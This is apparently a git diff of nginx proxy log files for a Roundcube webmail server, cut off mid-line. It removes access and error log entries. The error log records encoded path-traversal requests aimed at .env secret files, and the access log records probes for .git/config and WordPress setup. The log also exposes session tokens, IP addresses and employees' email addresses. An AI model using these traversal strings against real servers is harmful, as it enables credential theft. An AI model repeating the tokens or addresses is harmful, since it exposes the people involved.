(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[18/Feb/2026:06:10:33 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.242] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[18/Feb/2026:06:10:36 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 195.178.110.242] [Length 146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" -[18/Feb/2026:06:10:37 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "-" "-" -[18/Feb/2026:06:10:40 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 195.178.110.242] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[18/Feb/2026:06:10:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 195.178.110.242] [Length 5345] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[18/Feb/2026:06:10:42 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 195.178.110.242] [Length 5356] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[18/Feb/2026:06:34:23 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/76892721029507" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:07:34:47 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/749408432210" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:10:36:09 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/29692719730346" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:11:36:34 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/302411196212851" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:12:36:57 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/16296355028267" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:13:37:20 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/28058106558622" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:14:37:43 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/25402311981443" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:15:38:05 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/2010270943770" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:16:38:31 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/19835181027399" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:17:38:54 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/13394307029520" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:18:38:55 +0000] - - 301 - GET https mail.hanmocnn.co.kr "/" [Client 54.82.229.81] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:38:56 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 54.82.229.81] [Length 2275] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/132.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:39:22 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/296711207917157" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:18:57:50 +0000] - - 301 - GET http mail.hanmocnn.co.kr "/" [Client 100.49.142.153] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" -[18/Feb/2026:18:57:51 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/rc/" [Client 100.49.142.153] [Length 2272] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" -[18/Feb/2026:19:39:45 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4540805912569" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:20:28:35 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:28:38 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=uGhqugh9LbQH64DtMCkpDUQVIkfU0h8Y" [Client 222.117.41.51] [Length 11623] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771446518595" [Client 222.117.41.51] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771446518651&_=1771446518594" [Client 222.117.41.51] [Length 3721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14536&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 6097] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:41 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=no-reply%40accounts.google.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:47 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 737] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:47 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14475&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:47 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=bogang.park%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:58 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14474&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:28:58 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 712] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:01 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14472&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:01 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=citecta%40naver.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:01 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:08 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14473&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4652] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:08 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=windpacer%40hanmocnn.co.kr&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:08 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:12 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14471&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 4878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:13 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 680] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13801&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5490] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:15 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 701] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:20 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=14470&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 5641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:20 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:20 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=support%40emailjs.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:23 +0000] - 200 200 - POST https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=move" [Client 222.117.41.51] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:23 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_caps=pdf%3D1%2Cflash%3D0%2Ctiff%3D0%2Cwebp%3D1%2Cpgpmime%3D0&_uid=13279&_mbox=INBOX&_framed=1&_action=preview" [Client 222.117.41.51] [Length 10283] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:29:23 +0000] - 204 204 - GET https mail.hanmocnn.co.kr "/rc/?_task=addressbook&_action=photo&_email=noreply%40flyasiana.com&_error=1&_bgcolor=transparent" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:40:09 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/8014472331921" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:20:54:38 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:20:54:41 +0000] - 302 302 - POST https mail.hanmocnn.co.kr "/rc/?_task=login" [Client 222.117.41.51] [Length 5] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_token=saMFaoGNg375BfWNWJ1B1GW2q5XK3TpP" [Client 222.117.41.51] [Length 11622] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=getunread&_page=1&_remote=1&_unlock=0&_=1771448081436" [Client 222.117.41.51] [Length 367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:20:54:41 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1771448081478&_=1771448081435" [Client 222.117.41.51] [Length 3715] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[18/Feb/2026:21:40:31 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/183921038210713" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[18/Feb/2026:22:12:24 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/wp-admin/setup-config.php" [Client 208.84.101.66] [Length 146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "-" -[18/Feb/2026:22:40:56 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/289971436316962" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[19/Feb/2026:00:41:44 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/601013513494" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[19/Feb/2026:01:42:14 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/202062540623129" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[19/Feb/2026:02:42:39 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/94071660517770" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" +[19/Feb/2026:03:43:01 +0000] - - 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/3119059711509" [Client 222.117.41.51] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" diff --git a/npm/data/logs/proxy-host-3_error.log b/npm/data/logs/proxy-host-3_error.log index 5931d29..06a5d90 100644 --- a/npm/data/logs/proxy-host-3_error.log +++ b/npm/data/logs/proxy-host-3_error.log @@ -1,112 +1,4 @@ -2026/02/14 23:40:14 [warn] 508#508: *770 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" -2026/02/14 23:40:18 [warn] 510#510: *785 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" -2026/02/14 23:40:37 [warn] 508#508: *770 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:40:38 [warn] 507#507: *871 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/14 23:40:39 [warn] 507#507: *875 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1" -2026/02/14 23:40:43 [warn] 507#507: *892 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1" -2026/02/14 23:40:43 [warn] 512#512: *821 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:40:44 [warn] 507#507: *895 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:40:44 [warn] 507#507: *896 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/14 23:40:45 [warn] 507#507: *897 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/14 23:40:45 [warn] 507#507: *898 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1" -2026/02/14 23:40:45 [warn] 507#507: *900 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1" -2026/02/14 23:40:46 [warn] 507#507: *899 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1" -2026/02/14 23:40:46 [warn] 507#507: *902 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:40:46 [warn] 507#507: *903 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1" -2026/02/14 23:40:54 [warn] 507#507: *924 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1" -2026/02/14 23:40:55 [warn] 507#507: *928 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1" -2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/" -2026/02/14 23:47:57 [warn] 506#506: *1044 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 52.87.77.128, server: mail.hanmocnn.co.kr, request: "GET /cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css HTTP/2.0", upstream: "https://192.168.0.250:8443/cache/3c8c8b3a1c6b3ce2aa532d167f918f5d056abec5.css", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/" -2026/02/14 23:48:20 [warn] 506#506: *1058 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" -2026/02/14 23:48:50 [warn] 506#506: *1058 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:48:51 [warn] 506#506: *1116 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/14 23:48:52 [warn] 506#506: *1117 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET 